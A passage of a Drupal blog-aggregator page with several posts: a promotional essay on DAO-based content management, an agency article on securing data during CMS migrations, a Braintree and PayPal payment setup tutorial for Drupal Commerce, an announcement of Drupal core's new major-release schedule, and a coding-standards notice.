    • Also includes a field search capability originally developed as a separate module by Matthieu Scarset, who was a guest on this show back in episode #298
    • Will also generate diagrams to illustrate your content workflows, showing the states defined and the transitions between them
Dec 04 2023
Dec 04

Disclaimer: This blog is based on analyzing events that have taken place in the DAO market over the past few years. The DAO market is unpredictable, so we are not responsible for your sudden desire to start creating blockchain content right now.
This blog offers insights into Decentralized Autonomous Organizations (DAOs), which are often subject to innovation, cosmic disruptions, and quantum leaps.
Note: the future is uncertain, so no one can know exactly what will happen next minute. It can surprise you with an unexpected challenge. However, you must first get acquainted with DAO to learn how to make money on both. Please fasten your seat belts because we are going on an incredible journey.
But: Before acting independently, consult our expert to avoid any mistakes or spontaneous DAO-related endeavors.

What are DAOs or decentralized autonomous organizations?

To understand what DAOs are, let us give you an example. Imagine a dinner with your friends. To make everyone happy, you form DAO. That is, you discuss all the options of dishes, diner-style, and so on. After you vote, make a choice collectively and accept the one that is the most successful compromise or desirable in your company. As a result, by exploring and making decisions together, you achieve the optimal result.
DAO can be a real revolution in many areas. DAOs are currently used in the financial sector, governance, and content creation. This approach can be integrated into almost any system where democracy prevails and all participants collaborate to make decisions. DAO is not the like-democracy approach, and it is its more advanced version.

What is the goal of Content Management with DAOs?

You can integrate more efficient content management into your system or company with  DAOs. The essence of its approach is inclusivity and accessibility to everyone. 
1. Decentralization and democratization
The top idea of decentralized autonomous organizations is to get rid of centralized governing. Unlike the usual hierarchy, the DAO system gives everyone a voice to participate in decision-making. Thus the opinion of each specialist will be taken into account.
2. Transparency and trust
Unlike other content management tools, DAO is the most transparent and trustworthy approach. The system is completely transparent, and thanks to the blockchain, content creators will never lose ownership.
3. Fair compensation 
DAO integrates into business, forming fair rewards for content creators who invest their time and material in developing the project. This highly optimized system allows you to automate most of the processes related to bonuses for each author in your company or service.
4. High-quality curation and detection
DAO has everything to check and validate the content. Using blockchain and DAO, you can create a rating system that will help you identify the creators of the most relevant or interesting content.
5. Innovations and experiments in the content
Thanks to DAO, the content industry is constantly evolving. This management method allows you to integrate and test experimental approaches into your projects, which you can use to create effective strategies and build non-traditional content management.
6. Community engagement and collab
Using DAO, the community can manage content skillfully and create a loyal atmosphere within the project. By integrating DAO into your project, you can increase the level of loyalty of potential customers by directly involving them in all processes.

For what is Content Management with DAOs best suitable? 

Administering and managing content with DAO is an exciting and effective solution. Businesses in the following areas should pay special attention to DAO:
Collaborative content platforms
Many authors often communicate on such platforms, and until recently, each of them could be left without a voice if they visited the site at the wrong time. Using DAOs will allow such organizations to guarantee the right to vote to every author, regardless of whether they can answer a question at a particular time.
Independent publishing houses and journalism
Journalism is an ideal industry for DAOs, as it is vital to take into account the opinions of everyone, including authors. By integrating DAO and a rating system into your content management system, you can eliminate the clutter that many authors can create and offer much more efficient solutions for all authors to collaborate for the common good.
Artistic communities
Having a voice that DAO can offer is crucial in such communities. Due to the high level of exclusivity of DAOs, each member of such a community will have a guaranteed right to vote regardless of the situation and the issue at hand.
Knowledge sharing platforms
DAOs can be used to create platforms where people can share their knowledge and experience. This allows for the creation of decentralized educational systems and collaborative learning environments.
Niche communities
DAOs can be an excellent tool for administering content in narrow-minded communities. To a certain extent, in such societies, DAO becomes a bulwark of structure, allowing each community member to participate in deciding the fate of the content. DAO also enables such communities to share information quickly and easily, considering all community members' interests.
Community-funded content
Thanks to the features available in DAO, not only authors get the opportunity to choose and help. Thus, readers can support individual authors with tokens using smart contracts. This feature, in addition to systematizing the release of content, also allows creating attractive conditions for authors and integrating a limited level of competition into the community with minimal pursuit of rewards.
Disruption of traditional publishing models
Unlike classical publishing administration and management systems, DAO offers a different way of looking at simple things. Instead of hiding information from readers, DAO offers to make publishers fully transparent, increasing user loyalty and benefiting the publisher itself.

DAO generally improves the content administration and management procedure, allowing creators and other platform participants to make decisions and even vote for them with cryptocurrency. Integrating DAOs enables the creation of a transparent and fair community with a moderate level of competition and sufficient incentives for development, but what other problems does content management with DAOs solve?

What problems do Content Management with DAOs solve?

Using DAO for content management solves a large number of problems, among them:

  • Lack of inclusivity in decision-making
  • Lack of transparency in the distribution of budgets and revenues
  • Lack of correlation between the quality of work and the popularity of authors and their remuneration
  • Excessive control and censorship of critical processes
  • Inability to integrate the client into the administration process
  • Low efficiency of content search tools
  • Minimal control over content and problems with obtaining ownership of it
  • Lack of opportunities for testing and innovative views

How does Content Management with DAOs work?

Blockchain technology is used to implement inclusive content management on the DAO platform. Here's a simplified explanation of how it works:

  • Decentralized infrastructure
    The blockchain and its nodes make all DAO information transparent, accessible, and non-fungible.
  • Smart contracts
    Smart contracts enforce the rules and conditions of cooperation within DAOs. They can be used to reward authors and attract users' attention by automatically fulfilling specific promotional needs.
  • Content creation
    Thanks to DAO and blockchain, authors can tokenize content, making themselves the only creator with exclusive ownership.
  • Content curation and voting
    The DAO community curates content by rating and voting on submitted content. Voting mechanisms can be based on reputation systems or token-weighted votes, allowing participants to have a say in determining which content is published or promoted.
  • Transparent governance
    Unlike other examples of content management and administration systems, DAO offers a high level of inclusiveness, and everyone can influence decisions and evaluations in such a system.
  • Fair compensation
    Using smart contracts and DAO, you can integrate an automatic system for calculating rewards into the platform, depending on predefined rules that are universal for everyone.
  • Community engagement
    Thanks to the inclusivity of DAO, you can significantly increase user engagement in your platform by having them directly participate in their future.

With DAOs and blockchain, you can create a platform where every creator can monetize their content while every user can influence the platform's future. Thus, you can create an extremely successful project using simple but highly effective technologies of the future.

Advantages and Disadvantages of Using Content Management with DAOs

Using Content Management with DAOs (Decentralized Autonomous Organizations) can offer advantages and disadvantages. 

Advantages

Decentralization: As a DAO is decentralized, no specific person controls the system.
Transparency: Decentralization allows DAOs to achieve high clarity, essential for gaining customer and user loyalty and trust.
Efficiency: DAOs are usually much more efficient than other administration and management systems.
Scalability: Due to the peculiarities of the DAO structure, it is straightforward to scale to the volumes you need.

Disadvantages

Complexity: DAO can be complicated to create and manage.
Security: Despite decentralization, DAOs can still be subject to successful attacks.
Regulation: Many jurisdictions currently lack a regulatory definition and recognition of DAOs.
Lack of experience: DAOs are not currently a widespread view for running a company, so gaining DAO experience is extremely difficult.

To summarise, it is safe to say that DAO can potentially revolutionize companies' operations. At the same time, you must deal with this management principle's drawbacks.

Content Management with DAOs Types

To make sure that DAO is adequate, we have prepared a few examples of successful use of DAO for content administration:

Wiki DAO

Wiki DAO is a decentralized organization that uses DAO to manage content based on a Wiki.

Discussion DAOs

Discussion DAOs are services and sites that use DAOs to create a network of discussion forums. 

DAOs running blogs

A blog DAO is a decentralized autonomous organization that uses its blog to manage. 

Document DAO

Document DAO is a DAO whose primary tool is documents. This project uses a DAO to regulate records-related issues and implement rewards for those authors.

The choice of instructions for DAO directly depends on your company's needs. Having familiarized yourself with the structure and theoretical part of DAO, you can easily choose the structure and rules that will be optimal for your project.

What is the future of Content Management with DAOs?

The future of content management with DAOs is still being determined. As is usually the case, it is currently unknown what the future holds for DAO. At the same time, many different trends can be used to predict the future of DAO. One of the most discussed and popular trends is DApps. 
DApps are mobile applications and software solutions that work on the blockchain and are completely transparent. The popularity of this trend is easy to explain, as DApps are accessible and understandable to many users. The combination of a high level of security and full transparency makes DApps a leader among the relevant topics.
Another trend related to DAO is the integration principles of decentralized autonomous association to obtain certain functionalities and achieve results. For example, some companies are now implementing and testing DAO as a system for managing entire projects, and the results of such tests are extremely positive.
In addition to the previously mentioned, at least a few trends indicate a bright future for DAO. We are talking about WEB 3.0, which should change everything, about artificial intelligence, which is already capable of performing the monotonous work that would take a specialist a lot of time in seconds. We should remember the development of machine learning.

The fact that these trends are currently among the most popular topics for discussion indicates that DAO is guaranteed a bright future, but what will it be like? There are many assumptions about what the future holds for DAO. Here are a few of them:

  • The DAO principle will continue to evolve to provide content management capabilities with better inclusivity and efficiency.
  • DAO will become even more inclusive and be used by more large and small companies for better content management.
  • The DAO principle will be used to create an atmosphere of consistency and engagement with users. Thus, the content administration will be entrusted entirely to the readers themselves.
  • DAO technologies and capabilities will be used for machine learning and developing artificial intelligence technologies.

To sum up

Overall, the Golems team believes that DAO is the future of content management. Thanks to its capabilities and functions, transparency and security, and of course, inclusiveness, this system is guaranteed to be in demand, and over time, it may even completely replace the classic hierarchical structure with a more constructive and efficient view of company and content management. We are excited to see how DAOs are used to manage content in the future! 

Nov 30 2023
Nov 30

Takeaway: Securing data is a continuous process, not just a one-time action. When we talk about CMS migration, especially for sites with sensitive information, the focus should be as much on keeping data safe during the move as on ensuring its ongoing security afterward.

As someone deeply involved in CMS migrations, my experience has shown that the real challenge lies not just in moving data, but in maintaining its integrity every step of the way.

This blog aims to clarify the challenges of ensuring security during a CMS migration, focusing on the tools, strategies, and best practices essential to protect your data. Whether you’re dealing with a government website or a private sector project, understanding these nuances is key.

We’ll explore how to identify and tackle potential security vulnerabilities, the significance of using the right tools and encryption, and how we applied these to Riverside County.

SHARE THE SUMMARY TO YOUR STAKEHOLDERS

Riverside County website homepage

Understanding security vulnerabilities in CMS migrations

In my experience with CMS migrations, particularly with platforms like Drupal, the security risks are often more subtle and complex than one might anticipate. We find key vulnerabilities not just in the potential for external threats, such as hacking or data breaches, but also in the migration process itself—like data handling and user access management.

Identifying vulnerabilities before migration

The first step in ensuring a secure migration is a thorough evaluation of your current system. This means looking beyond the surface and diving into the details of your CMS’s structure and data handling.

For example, how are user profiles managed? Are there any outdated modules or themes that might pose a risk? These aspects need to be carefully reviewed, especially for sites with a lot of user data or government information. The focus should be on identifying any weak points that could be exploited during the migration process.

It’s not just me who suggests this either. Look at what David Rubie-Todd, Co-Founder and Marketing Director of Glide has to say about this:

"For me, the best way is to perform a thorough audit of the data before initiating the migration process. This may not be an obvious step, but it's crucial to identify any potential vulnerabilities or outdated data that could compromise security during the transfer.

This approach came about after a migration project I was leading where we discovered halfway through that some of the data had not been updated in over five years and was not compliant with the current security protocols. It taught me the vital lesson of being proactive rather than reactive when it comes to data security during CMS migration."

Zephyr Chan, Founder and Growth Marketer of Better Marketer also puts it nicely:

"Migrating outdated, unnecessary, or sensitive data not only clutters your new CMS but also increases security risks.

I learned this the hard way during an early migration. We transferred everything, including old accounts and outdated files. It was a mess and a security headache. Post-migration, we found ourselves sifting through a digital junkyard.

Before any migration, you should audit your data thoroughly. You can remove what's not needed. This approach streamlines the migration and tightens security. It's like moving house—why pack and move stuff you don't need?"

cluttered desktopImage from ZME Science

Having a separate database layer

When migrating to a new system, it's crucial to ensure that not only your Drupal codebase is secure but also your database and server. Ideally, the database should be on a different server than your codebase to enhance security against potential hacking attempts.

There should be a separate database layer to prevent easy access to your database. It's essential to store the database safely in a different location. The code and database servers should interact using encryption keys for security.

Database layer

Best practices suggest that for migrations, whether you’re migrating from an older version of Drupal (Drupal 7 or earlier) or from another CMS to Drupal, attention should be paid to the locations of the database, file system, code, and repositories, like GitHub.

Previously, these components were often stored on the same server, but now, with improved security practices, it's important to ensure proper configuration even before updating or upgrading your Drupal systems.

Why a proactive approach in security is best

A proactive approach to security is non-negotiable. This involves not just patching up known vulnerabilities but anticipating potential issues that could show up during migration. It's about being one step ahead.

Montserrat Cano, International SEO and Digital Marketing Consultant at Montserrat Cano believes in involving the IT team right from the start:

"Involve the right people! During the migration process, especially during a re-platforming, there is a particular moment when the website is especially vulnerable to cyber-attacks. Working closely with your IT team will help protect your brand.

A second tip is to ensure that you audit well to understand what data there is and what you need to keep. This is especially important with customer data. Back up data in case of any issues."

In practice, this means ensuring that all software is up-to-date, using robust encryption methods for data transfer, and being vigilant about access controls and permissions. The goal is to mitigate risks before they become actual problems.

Alex Stasiak, CEO and Founder of Startup House recommends the same thing— to practice the principle of least privilege:

"Only give access rights to those who absolutely need them for the tasks at hand. We stumbled upon the value of this approach after a migration where excessive access led to unintended data exposure. By narrowing access, the chance of leaks tightens up significantly. Couple this with real-time monitoring to catch any unauthorized access attempts, and you turn your data migration into a fortress, with data moving securely and only accessible to a select few knights sworn to protect it."

Tools and strategies for a secure migration

A successful and secure CMS migration hinges on a combination of the right tools and their strategic application. It's about weaving a tight security fabric that leaves no loose ends.

Choosing the right tools for the job

The effectiveness of the migration largely depends on the tools we choose. For instance, in Drupal migrations, I often rely on PHP Data Objects (PDO) for database abstraction. This isn’t just a preference; it’s about ensuring the highest level of security in data handling.

We encrypt sensitive information such as API keys, tokens, passwords, and personal data. This encryption, along with PDO statements, ensures secure data insertion into the new database.

Another indispensable tool in our arsenal is the Security Review module in Drupal. It’s like having a vigilant guard that continuously monitors the site’s security status, pinpointing vulnerabilities and guiding us on how to fortify our defenses.

New Relic Digital Experience Monitoring is another tool we use, which comes standard with Acquia. It's instrumental in identifying security threats.

For example, if we’re getting slow web transactions, slow queries and repeated attempts, New Relic helps us detect that. We can then block the offending IP address. This tool is invaluable for maintaining site performance and security, allowing us to quickly identify and address issues like bot attacks.

But it’s not just about having the right tools—it's about how you use them. Take PDO, for example. We don’t just use it for database interactions; we make sure each data field is processed through secure functions.

This meticulous approach is critical in preventing vulnerabilities like SQL injection. Similarly, data sanitization, particularly in web forms, is a practice we emphasize repeatedly. It’s about making sure that what goes into your database is exactly what’s supposed to go in—nothing more, nothing less.

I’ll go into these in detail when I discuss the Riverside County project.

The crucial role of encryption

A key aspect we can’t overlook during migration is encryption. It’s our fail-safe. Drupal actually provides options for encrypting keys. For instance, if your file system and database are on different servers, Drupal has modules that encrypt and store these keys securely. This ensures that whether the data is on a development, test, or cloud server, it remains out of reach from unauthorized access.

I like how Burak Özdemir, Founder of ozdemirburak.com puts this:

"In spy movies, there's always that tiny device that destroys all the evidence. We don't go that far, but we do something sort of similar with encryption keys. 

They are kept separate from the data. If someone grabs our database, they'd just get gibberish without the key. 

The "aha" moment came when we heard about a company that lost everything because their keys were taped to the data—figuratively speaking. Not us. We keep our keys in our pocket, away from prying eyes."

Another example I can give you is when I worked on the Knowledge Network project. They had a lot of sensitive user data on their website. They were concerned about how this data would be handled, especially on test servers.

British Columbia's Knowledge Network logo

At Promet, we specifically wrote scripts in Drupal to encrypt data flagged by the client. The migration scripts were carefully crafted to ensure data security.

Drupal offers default modules like Migrate, Migrate Upgrade, and Migrate Tools for migrations, which are user-friendly. Additionally, you can incorporate custom code to encrypt sensitive user data. Drupal provides numerous examples on how to write these scripts, allowing you to customize and execute them for secure data migration to the new system.

Speaking of which, Drupal is impressive in this regard. They offer a lot of test scripts within their migration-related modules. When you install these modules, they provide a set of test scripts that you can modify and use for your migration. It's quite handy and effective.

This is one of the many reasons why we advocate for open source for government websites—you don’t really get these with proprietary systems.

Navigating government standards in the Riverside County project

For Riverside County, our approach was multifaceted, involving the meticulous migration of content from over 50 non-Drupal websites into Drupal. This wasn’t just a matter of transferring data; it was about redefining how we protect it during the migration.

How our team ensured security for the Riverside County migration

Here’s a quick summary:

Secure CMS migration checklist

The key aspect is staying up-to-date with security releases. We subscribe to all Drupal release notifications and ensure that all modules and themes are consistently updated.

The first point to note is that we always use the Security Review module for every project. This is a standard practice, whether it's a newly migrated website or one we're building from scratch. This applies to all migrations, whether Drupal-to-Drupal or from another CMS to Drupal. Anything coming into Drupal undergoes this security review.

Next, writing secure code is crucial. Drupal has robust standards for coding, including specific functions to use when interacting with data. This includes stripping off extra or special characters. At Promet, we adhere to these secure coding standards in all our custom code and patches.

Managing sensitive keys effectively is another crucial aspect as I mentioned earlier. Drupal's Key module is excellent for handling various keys, like API keys, encryption keys, and database keys. It ensures all sensitive keys are securely stored and managed.

Additionally, we use Twig templates for front-end display. These templates ensure that data coming from the database is properly sanitized and presented in a user-friendly format.

For instance, they can filter out extraneous characters, like Chinese or Persian characters, displaying data in plain English. This also applies to form inputs, ensuring we only capture and store clean data in our database.

So, the security measures apply in both directions. We use a database abstraction layer for querying the database. We utilize PDO, which means we don't use straightforward queries. Instead, each field goes through a secure function, ensuring SQL injection is completely mitigated.

Regarding bot attacks and failed login attempts, we have measures in place to address these. If we detect multiple failed login attempts from the same IP address—say, four, five, or ten times—we block that account for a period like 24 or 48 hours. This is a configurable Drupal default security feature, tailored to each client's needs.

Drupal's flood table records failed login attempts, including the username and IP address involved. We can configure it to block access after a certain number of failed attempts, regardless of whether they come from the same or different IP addresses.

Effective user roles and permissions management is also crucial. We ensure that anonymous users don’t have access to modules they shouldn’t. Even for authenticated users, roles are clearly defined. For example, a content manager would only have access to manage content, not to the administrative functions of the website.

We also advocate for strong user authentication methods, like two-factor authentication. While it's up to the client to implement it, we always recommend having secure passwords, especially for admin accounts.

Lastly, we advocate for the use of HTTPS on all websites to ensure secure communication. Having a secure certificate is something we consider a best practice for all our projects.

We ensure HTTPS is used for both back-end and front-end, as we did for the Riverside County project. This is crucial for secure communication.

Implementing enhanced encryption measures

In addition to Drupal’s standard encryption, we applied an extra layer of security. This robust encryption practice was crucial in safeguarding data across various servers, including development, test, and cloud environments.

It was a step beyond the norm, tailored to address the specific security needs of a government project like Riverside County.

Strategic file migration and file permissions for enhanced security

Another aspect of our strategy was the migration of files as media entities within Drupal. This approach not only offered enhanced security for sensitive documents, such as resumes and cover letters, but also improved their usability within the new system.

Secure file permissions are also a key aspect. File permissions should be configured to grant access only as necessary. This applies not just to user-uploaded files like PDFs or Excel documents, but also to core code files, like PHP files and autoloaders.

These files execute when a homepage or index page is accessed, so it’s important to set up a secure file hierarchy. The permissions should allow only the necessary user groups, like 'www-data' for Apache, to have execute permissions.

And if it’s a public folder, we adjust permissions accordingly. For example, administrators or content managers might have write permissions, and users might be allowed to upload resumes. But execute permissions are always given with utmost caution to maintain security.

By the way, this approach to securing file permissions isn’t client-specific; it’s a standard practice at Promet to ensure a secure website.

Maintaining discretion for sensitive information

A unique requirement of this government project was the careful handling of highly sensitive information. For instance, ensuring that phone numbers of higher authorities were not immediately visible on the website, but accessible through multiple layers of screening.

This level of discretion was crucial in upholding the privacy and security standards expected of a government site.

On data privacy

Regarding GDPR compliance, we support various compliance tools like OneTrust or Cookiebot, depending on the client's requirements. Some clients are keen on GDPR compliance, so we ensure their sites adhere to these regulations, including the use of cookie banners. However, if a client doesn't require it, we may not implement such features.

Have a secure CMS migration journey with Promet Source

When it comes to CMS migration, you need a balanced approach that prioritizes both technical precision and security.

As we’ve explored, the key to a successful migration lies not just in the tools and strategies employed but also in a deep understanding of the potential vulnerabilities and a commitment to proactive security measures.

Whether it's managing intricate government data or ensuring the integrity of a private enterprise’s digital assets, the principles of diligence, thoroughness, and continual vigilance remain paramount.

Remember, a secure migration is a journey that extends beyond the technical transfer of data. It’s about building a foundation of trust and reliability, ensuring that your data remains protected, and your digital presence robust and resilient in the face of evolving cyber threats.

Are you preparing for a CMS migration and concerned about the security of your data? Our team of experts is here to guide you through every step of this critical process. With our deep expertise in CMS migration and a focus on robust security practices, we ensure your transition is not only smooth but also fortified against potential risks.

Connect with us for a personalized consultation, and let’s ensure your CMS migration is a secure, seamless, and successful journey. Your digital assets are invaluable—let’s protect them together.

Nov 30 2023
Nov 30

Would you like to offer a recurring payment option in your online store? If so, this article is for you. You'll learn how to configure the Drupal Commerce Braintree module enabling payment processing through the Braintree gateway, how to link it to your PayPal account, and how to test and successfully launch this solution on your Drupal platform for online selling.

What is Braintree?

Braintree is an online payment service offered by PayPal that makes it easy to accept payments on websites and mobile apps. It provides support for various payment methods, including credit and debit cards, PayPal, Apple Pay, Google Pay, and others.

Braintree PayPal functionality includes:

  • Seamless integration: Braintree ensures convenient SDKs (Software Development Kits), which are a set of tools that facilitate integration with various platforms and technologies.
  • Multi-currency support: the service supports payments in more than 130 currencies, making it an attractive solution for companies operating in international markets.
  • Advanced risk management tools: Braintree offers various risk management and fraud prevention tools, such as 3D Secure and Advanced Fraud Tools.

Braintree is, therefore, a comprehensive ecommerce solution that allows you to manage online payments in a simple and secure way.

Installing the required modules in Drupal Commerce

If you have followed my previous article on recurring payments/subscriptions in Drupal Commerce using the Commerce Recurring module as an example, you most likely already have all the required modules.

As a reminder, these are:

You install the modules by calling the command in the terminal:

composer require drupal/commerce_recurring drupal/commerce_braintree

Or by downloading it directly from drupal.org and unzipping it to the /modules/contrib directory.

After Composer finishes downloading, go to the module list page (/admin/modules) and activate all the ones mentioned earlier, or use Drush:

drush en commerce_recurring commerce_braintreee

Creating and configuring the Braintree gateway

The Drupal Commerce ecosystem offers more than 100 pre-built modules that support various payment services, such as Amazon Pay, iDEAL, PayU, Stripe, PayPal, or Braintree (see the documentation for the complete list). In this blog post, we'll focus on configuring the latter, going through the entire process step by step. 

Obtaining Braintree API keys

In order to properly configure the payment gateway, you’ll need a Sandbox account, which you’ll set up at Braintree. You’ll also require a pair of keys for the application. You’ll obtain it from the developer section of the website. The registration process is straightforward and intuitive.

After creating an account, go to https://sandbox.braintreegateway.com/login and log in using the information you provided at registration. Click on the cogwheel icon in the upper right corner and go to the API subpage. In the API keys section, you can see an entry for your API key. 

Obtaining API keys in Braintree is one of the steps in setting up a payment gateway for a store.

Source: sandbox.braintreegateway.com

Click the View link to see the details. Leave the tab open, as you’ll need it for further configuration.

The Client library key in Braintree contains information such as private key and merchant ID.


Merchant account ID

The additional information you need is the Merchant Account ID. This is a different value than the Merchant ID. To set it, click the cogwheel icon and go to the Business tab.

Merchant Account ID is a unique alphanumeric string you can set yourself for easier identification. The important thing here is that when you create a new Merchant Account, you set the main currency in which you’ll accept payments. 

The Braintree application allows you to set the currency in your account to accept payments.


Drupal Commerce-side configuration

After installing the module, go to the /admin/commerce/config/payment-gateways subpage, where you’ll find a list of all payment gateways configured on your Drupal Commerce platform. Click the Add payment gateway button.

The Name field is the name that will identify your gateway on the admin panel side. From the Plugin list, select Braintree (Hosted Fields).

At this stage, in the Mode section, set the Test mode, and in the Payment method types field, select the payment methods you want to accept (currently, the module for Drupal only supports direct payment by credit card and PayPal).

Lower, there are additional options for configuring the plugin. Collect billing information when checked will make the form data stored in Drupal. According to the disclaimer under the box, make sure that you can legally opt out of this option and rely only on data stored in Braintree.

The example of configuring options on a Braintree account for an online store on Drupal Commerce.


Then fill in the fields Public key, Merchant ID, Private key, and Merchant account ID with the data obtained from Braintree. You can also enforce 3D Secure, which enables strong authentication following the Payment Services Directive 2 (PSD2) on payment services.

The Enable Credit Card Icons option is strictly visual and determines whether payment card icons will be visible in the payment form:

In the Braintree account, it is possible to set the payment card icons visible in the online store.


In the Conditions section, you can decide under which conditions the defined payment gateway will be available, such as when the customer is logged in or has products in the shopping cart for a certain amount. After configuring this section, click Save to move to the list of payment gateways.

You can also define a condition by which Braintree will be available only for subscription products, leaving other payment gateways for the rest of the products. 

The Braintree PayPal module allows you to set up a payment gateway for subscription products only.


Payment testing

Now, you can add the product to your cart and go through the entire checkout flow, which is the process of completing your order. When you reach the payment step, select a payment card. The test details are: card number 4111 1111 1111 1111 1111, expiration date (later than the current month and year), and any CVV code according to the PayPal Braintree test instructions.

At the Braintree PayPal payment testing stage, you need to enter test payment card details.


Once you’ve moved on and completed the checkout process, you’ve created a subscription. You can check its current status by going to [page_drupal]/admin/commerce/subscriptions on your website. There you’ll find the details:

Once Braintree is configured, you can see the subscription details on settings in the Drupal panel.


In this case, the purchased subscription has been configured to renew every hour. Payments are created to cover the following set periods. Similarly, you can look at the panel in Braintree, which is available in the Transactions tab. 

In the transactions tab of the Braintree PayPal dashboard, you can see the details of all payments.

PayPal payment integration

While payment by card is available immediately after installing the module ("out-of-the-box"), PayPal payment requires additional configuration on the Braintree side. So navigate via the cogwheel icon to the Processing tab. Here, you can choose which payment methods are accepted for your application. Under the PayPal switch, click Link Sandbox. 

The PayPal payment option in the Braintree gateway requires additional configuration in the panel.

Obtaining PayPal API keys

In order to properly configure the payment gateway, you’ll need an account that you set up with PayPal and a pair of keys for the application, which you’ll obtain from the developer section of the website. The registration process is highly intuitive.

After creating an account, go to https://developer.paypal.com/. In the upper right corner, there is a Log in to Dashboard button that you need to press. Once logged in, go to Apps & Credentials. A web page will appear so you can manage your applications.

In your PayPal account in the Apps & Credentials section, you can manage your connected applications


Source: developer.paypal.com

In the upper right corner of the web page is the Sandbox/live switch. To begin with, focus on setting up the gateway in Sandbox mode, so click Sandbox.

In the REST API apps section, click the Create app button. In the App name field, enter a name for your app so that you can identify it in the PayPal developer panel.

In the Sandbox business account field, you may notice that there are two email addresses to choose from: one in the personal domain and the other in the business domain. These are test accounts created by default on PayPal to test payments. If you would need additional accounts, you can make them by clicking Sandbox>Accounts in the left-hand menu and then – Create account. Select the account in the @business.example.com domain as the account that will "own" the application you’re creating. 

 You can create a new application for an online store or marketplace platform in your PayPal account.


As you’ll see later in the blog post, in the live mode, this field is skipped, as the application keys are linked directly to the PayPal account by default. Once the process is complete, you’ll look at information about the created application.

In the Sandbox account field, you’ll see the sandbox email address set as "owner." At this point, you’re interested in the Client ID and Secret areas (you may have to press the Show button to reveal them). This key pair allows you to communicate with PayPal's API.

You can find a pair of keys in the PayPal account to communicate with the PayPal API for integration


Below, you’ll find other configuration options, such as setting the address to which users should be redirected after a completed transaction. We recommend checking the Transaction Search box, which is unchecked by default and offers access to transaction history. After making changes, Save them.

Then, you need to complete the required data in the Braintree module configuration.

The Braintree module configuration allows you to set the subscriptions, invoices or PayPal data.
 

Checkout flow

Now, during the checkout process, you can select PayPal as a payment option (remember to enable it in the gateway settings). After selecting it, you’ll see a yellow PayPal button.

Being aware that the gateway is temporarily running in Sandbox test mode, you need Sandbox account details. To do this, go to the Sandbox>Accounts tab on the PayPal developer page. There, you’ll see a list of developer accounts assigned to your account.

The PayPal platform allows testing any configuration changes in a virtual Sandbox test environment.


Remembering that you’ve assigned an account in the business.example.com domain to your application, click View/edit account for the personal.example.com domain. From the window that appears, copy the Email ID and System generated password (you can change the password at any time by clicking Change password) and paste them into the corresponding fields in the login window that appeared during the purchase process.

Braintree PayPal - go live

After testing the operation, you can switch to Live mode. The process looks identical to the Sandbox application.

To do this, return to the dashboard on the PayPal developer website and Braintree. Click Live in the toggle at the top of the web page and then Create new app. Go through the identical process as before, ending with receiving the keys. Then, go back to the payment gateway settings, switch the checkbox to Live, and fill in the new data.

Congratulations! You’ve successfully set up the Braintree payment gateway and linked it to your PayPal account.

Recurring payments in Drupal Commerce - summary

From our experience with the implemented Drupal Commerce services, we know that setting up recurring payments isn’t complicated. And if you’ve been following the blog post on subscriptions mentioned at the beginning of this text, you already have everything set up. In case your subscriptions are product-based, you don't need to do anything else – just have your customers select the options provided by Braintree as their payment method, and the Commerce Recurring module will take care of the rest.

Nov 30 2023
Nov 30

Drupal core has just announced a new major release schedule. Major releases will come out every two years and be supported until at least two more major versions have been released. (i.e. for at least four years).The new schedule will provide Drupal websites with a reliable foundation of support and security while allowing a longer window to update to new major versions.

This marks the first major change to Drupal core’s release cycle for seven years, so it’s worth some background on how we got here.

With the release of Drupal 8.0.0 in 2016, we started to release patch versions every month, and a new minor every six months. Previous versions of Drupal core didn’t have the concept of patch and minor releases, so this was a completely new process, but it’s one that we’ve stuck with since.

However, what we didn’t have a plan for in 2016 was how to manage new major releases. All we knew was that we didn’t want to keep doing major releases like we’d done previously with Drupal 8, 7, 6 and earlier. Major releases would drop some backwards compatibility layers and deprecated code, remove some old database updates, but the rest was still to be defined.

During Drupal 8, we updated a full major version of Symfony from version 2 to 3 without releasing a new major version of Drupal core. This led to more disruption in minor releases than we would allow now, so we decided not to do that again.

However, without updating dependencies to new major versions, this means that any one major version was stuck on the same ones it started with. Both Drupal 8.9 and Drupal 9.5 had shorter EOLs that core committers were comfortable with, driven by the EOLs of Symfony and CKEditor4.

Unless we wanted to assume security responsibility for outdated versions of Symfony or CKEditor 4, we had no choice but to drop support when they did. This led to a rush where all contrib modules and all sites needed to go from one major version to the next within the space of around twelve months. Many people will still be in the middle of this rush with Drupal 9.5 to 10.0.

While we knew this was a problem from around the release of Drupal 9.0, solving it was a bit harder, and required solving several complex issues:

1. Version dependencies

 We needed to ensure that new major versions of Drupal were on the most recent versions of its dependencies. Drupal 10 was the first release to achieve this, using both Symfony 6 and CKEditor 5. This required a major effort to jump from Symfony 4 to Symfony 6, providing bridges between the two where we could. As well as a complete rewrite of our CKEditor integration from version 4 to 5.

2. Dual-version support

 We needed to figure out how to support two major versions for a much longer overlapping period. With Drupal 8 and 9, while the EOLs came up very quickly after the new major release, it also meant that modules only had to worry about supporting two major versions for approximately one year, it also meant that we would generally not try to update minor versions of dependencies or add support for new PHP versions.

The two year overlap for major releases, combined with a major release every two years, means that we will always be supporting two major releases, all the time (as well as working on the development branch for the next one sometimes.

Our first idea was to just extend security support for the older major release for an extra year, however this runs into three problems:

PHP’s three year support cycle meant that if you don’t add support for new PHP versions for two years, you barely have security coverage. The PHP team appears to have realized this is a wider problem for downstream projects, and might be extending security support from three years to four.

Also, since new APIs and deprecations will be added every six months in the new major version, over two years this massively increases the likelihood that contrib modules won’t be able to support both core versions with a single branch.

We generally try to restrict minor releases of PHP and JavaScript dependencies to minor releases of Drupal core, but many dependencies only provide 6-12 months of security coverage for a minor release.

One possible solution was to allow for unscheduled minor releases, for example to update to a new minor release of a dependency if it dropped support for an older version of PHP. However, a site that hasn’t done a minor update for 18 months suddenly faced with a new minor release might not be able to apply that easily.

The path forward 

The solution we eventually came up with was to continue releasing ‘maintenance’ minor releases for the older major version. These will contain a subset of issues committed to the new major release, mostly PHP compatibility issues, API additions, and dependency updates. The hope is that this will allow contrib module developers to more easily support both major versions by reducing divergence over time, keep core up-to-date with dependencies, and allow sites to stay up-to-date with newer versions of PHP. All of these should combine to make it easier (or at least, not harder than now) for sites to move to new major versions when they’re ready, just with a longer timeline to do so.

Nov 29 2023
Nov 29

The Technical Working Group (TWG) is announcing two coding standards changes for final discussion. Feedback will be reviewed at the meeting scheduled for Wednesday 20 December 2200 UTC.

Issues for discussion

The Coding Standards project page outlines the process for changing Drupal coding standards.

Join the team working on Coding Standards

